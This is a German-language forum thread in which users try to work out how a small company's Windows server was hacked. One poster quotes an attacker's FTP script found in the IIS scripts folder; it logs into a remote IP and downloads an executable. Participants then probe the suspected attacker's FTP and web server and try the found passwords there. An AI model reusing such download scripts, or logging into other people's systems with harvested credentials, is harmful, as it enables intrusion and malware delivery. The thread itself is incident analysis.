Server gehackt

[funkybrain]

Vielleicht hat jemand den Traffic mit einen Sniffer Programm abgehört und so ein Kennwort für den Server herrausgefunden... (ist ein Kinderspiel) Nur wenn Port 21 zu war geht das wohl nicht mehr .. :-(

andere Frage: Kann man bei deinen OS herrausfinden wer der Ersteller der Dateien war ????


Auf jeden Fall ein guter Tipp: Alle relevanten Passwörter ändern !!!!

Aber es stellt sich nur die Frage:
Wie bekommt man 4 Gigabyte hinauf, wenn nur 64 KBit Uplink vorhanden sind. Wenn ich mich nicht verrechnet habe müßte der Upload vorgang ca. 6 Tage gedauert haben.

(Wenn 6 Tage der WAN Zugang voll im Einsatz ist, sollte man das schon merken ?)

Ohne deine Mitarbeiter zu verdächtigen, ich würde mal überprüfen ob der Angriff nicht von drinnen kam.

Hast du WLAN ? (Das könnte ein Sicherheitsloch sein!)

[valo]

Zitat:

Original geschrieben von BOfH
Wer weiß schon wieviele witzige Mitarbeiter in einer Firma einen Drang haben, am Server rumzufummeln

viel zu viele

[LouCypher]

-64kbit uplink d.h. von server ins internet (adsl), um daten auf dem server zu schicken sind eh 512kbit vorhanden.

-kein wlan

-sniffer kann ich mir nicht vorstellen weil der müsste ja zwischen server und router, bzw. router und dsl modem oder beim provider hängen. Ein sniffer kann ja nur sniffen was direkt an ihm vorbeigeht, ausserdem sind die clients über einen switch verbunden was einem sniffer auch nicht wirklich hilft.

-sämtliche passwörter wurden heute bereits geändert.

-den ersteller erkennt daran dass er der eigentümer der datei ist.

Für mich gibts nur 3 lösungen, entweder kams von drinnen, da gibts allerdings ein problem, der ftp server hätte ohne routerkennwort nie funktionieren können, und dass konnte dort niemand kennen. Ob er tatsächlich gefunkt hat kann ich leider nicht feststellen, weil wenn jemand das router passwort kennt kann er auch die spuren verwischen.

Die 2. lösung wäre ein mitarbeiter vom ISP, was ich mir zwar auch nicht wirklich vorstellen kann, aber eine andere erklärung hab ich nicht, schliesslich müsste der angreifer 2 kennwörter kennen und wissen was auf dem server los ist ohne portscan (weil die gabs nämlich nicht).

Die 3. der angreifer weis, woher auch immer dass unter der ip ein terminal server läuft. Er nützt irgendein sicherheitsleck am IIS welcher aktiv war um adminrechte zu bekommen, auch wenn sicherheitsupdatemässig alles ziemlich up-to-date war. Erstellt ein benutzerkonto mit adminrechten, steigt via terminal client ein und saugt sich ein paar warez und die ftp software vom eigenen ftp server und startet die software. Dann müsste er noch die firewall öffnen damit man von draussen rein kann, das schafft er aber nicht weil er das passwort nicht kennt, gibt auf, löscht das konto und vertschüsst sich. Der 4 GB download währe dann eine erklärung für die langen pings, allerdings hätte der provider mitarbeiter der relativ kompetent gewirkt hat dass doch merken müssen dass da mit vollgas daten über die leitung sausen während wir beide nach der ursache
für die schlechte verbindung gesucht haben.

[LouCypher]

Hab was neues entdeckt:

im inetpub\scripts ordener sind 2 dateien:

-ftpcom
-servdaemon.ini

die ini ist leer, bei der ersten steht:

open 195.127.122.130 1967
stro
stro
get sede.exe
get servudaemon.ini

das drin. Eigentümer sämtlicher dateien ist das internet gast konto
die ip sagt schon ein bisschen mehr, ich vermute das ist noch so ein unfreiwilliger server . Ich würds dem Dietmar ja sagen aber hat keine email .Da hat sich schon wer etwas mühe gegeben.

[LouCypher]

Seit stunden versucht jemand mit der ip 80.129.58.97 auf meinen port 1967 zuzugreifen. Ich glaub dass ist er, kommt wer rein bei ihm

Senatoren bitte warnen falls diese hexenjagd zu weit geht!

[valo]

die ip gehört zumindest zum deutsche telekom ip range die sie wahrscheinlich für die dynamischen ip's verwenden...

naja, das kann bei jeder einwahl von wo anders kommen...

[LouCypher]

Aber am port 1967 läuft ein ftp server nur lässt er mich nicht rein und am 80 ein web server, gibs mal im browser ein. Hab jedenfalls an die abuse adresse geschrieben, bin neugierig was passiert, schliesslich könnte der ja auch nur ein opfer sein.

[renew]

Zitat:

Original geschrieben von LouCypher
Aber am port 1967 läuft ein ftp server nur lässt er mich nicht rein und am 80 ein web server, gibs mal im browser ein. Hab jedenfalls an die abuse adresse geschrieben, bin neugierig was passiert, schliesslich könnte der ja auch nur ein opfer sein.

Hmm, meiner Meinung nach, schaut das seeehr verdächtig aus. Besonders der Web-Server.
Zumindest der Seitentitel schaut sehr nach "Warez-Szene" aus.
Der Web-Server is OmniHTTPd/2.09 - falls dir das was bringt.

Naja, ich bin schon gespannt ob da was raus kommt.

PS: ich hab jetzt ftp://80.129.58.97:1967 nix gefunden - oder hast du böser einen Portscan gemacht?

[LouCypher]

Gescannt hab ich noch nicht, vorher hats mit der port nummer gefunkt jetzt gehts ohne, einfach ftp://80.129.58.97 leider funzen die pw von unten ned.

[James]

also warez szene ich weiss ned wenn man sowas macht is das das erste was man macht einen speed test weil zuerst 4gb uploaden auch wenns schnell geht und das san 54kb auch ned sich ned auszahlt über 6kb up dann zu verteilen

also gibts eigentlich nur 2 möglichkeiten

1. Einer aus der Firma wer auch immer...
2. Irgendwer der sich einen spass draus macht die unsicher einstellung des netzwerks auszunutzen...

schade is das du gleich alles unterbunden hast weil sunst hättest erm gleich ghabt weil zugreifen muss er ja mal drauf...

btw: wenn du XP hast die remoteverbindung war/ist fehlerhaft und angreifbar